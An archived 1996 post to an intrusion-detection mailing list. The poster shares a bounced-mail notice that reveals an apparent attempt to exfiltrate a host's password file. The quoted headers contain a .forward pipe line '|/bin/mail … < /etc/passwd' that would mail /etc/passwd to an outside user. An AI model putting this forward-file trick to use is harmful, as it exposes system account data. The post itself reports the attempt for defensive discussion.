IDS Mailing List detects intrusion attempt ?

Justin J. Lister (ruf@osiris.cs.uow.edu.au)
Fri, 15 Mar 1996 13:56:04 +1100 (EST)

Messages sorted by: [ date ][ thread ][ subject ][ author ]
Next message: Messages Roswell: "POINTCAST - Could it be a Trojan Horse?"
Previous message: Paul Danckaert: "RE: netscape"

G'day,

        I dont know if this was a deliberate attempt to be amusing 
(definately to early for April Fools) but the owner-ids received an
interesting Returned: mail from MAILER-DAEMON@pollux.cs.uga.edu.

Could be a first 'Intrusion Detection List catches attempted intrusion'
(hey Steve do you have an intrusion penetration rule for this scenario).

The mail was in response to a subscription request to IDS (attempting to
deliver the list introduction message).

The Headers from MAILER-DAEMON:

Date: Thu, 14 Mar 1996 21:20:34 -0500 (EST)
From: Mail Delivery Subsystem <MAILER-DAEMON@pollux.cs.uga.edu>
Subject: Returned mail: /home/temps/lodwick/.forward: line 1: |/bin/mail lodwick@pollux.cs.uga.edu < /etc/passwd... User lodwick@pollux.cs.uga.edu doesn't have a valid shell for mailing to files
To: <owner-ids@uow.edu.au>

The original message was received at Thu, 14 Mar 1996 21:20:30 -0500 (EST)
from wyrm.its.uow.edu.au [130.130.68.1]

   ----- The following addresses have delivery notifications -----
|/bin/mail lodwick@pollux.cs.uga.edu < /etc/passwd  (unrecoverable error)
    (expanded from: <lodwick@pollux.cs.uga.edu>)

   ----- Transcript of session follows -----
553 /home/temps/lodwick/.forward: line 1: |/bin/mail lodwick@pollux.cs.uga.edu <
 /etc/passwd... Unbalanced '<'
550 /home/temps/lodwick/.forward: line 1: |/bin/mail lodwick@pollux.cs.uga.edu <
 /etc/passwd... User lodwick@pollux.cs.uga.edu doesn't have a valid shell for ma
iling to files

-- 
+---------------------+--------------------------------------------------+
|  ____       ___     | Justin Lister                 ruf@cs.uow.edu.au  |
| |    \\   /\ __\    |     Center for Computer Security Research        |
| | |) / \_/ / |_     | Dept. Computer Science       voice: 61-42-214-327|
| |  _ \\   /| _/     | University of Wollongong       fax: 61-42-214-329|
| |_/ \/ \_/ |_| (tm) | LiNuX- iNTEL justification. mobile: 61-0411405217|
|                     |     Computer Security a utopian dream...         |
+---------------------+--------------------------------------------------+

Next message: Messages Roswell: "POINTCAST - Could it be a Trojan Horse?"
Previous message: Paul Danckaert: "RE: netscape"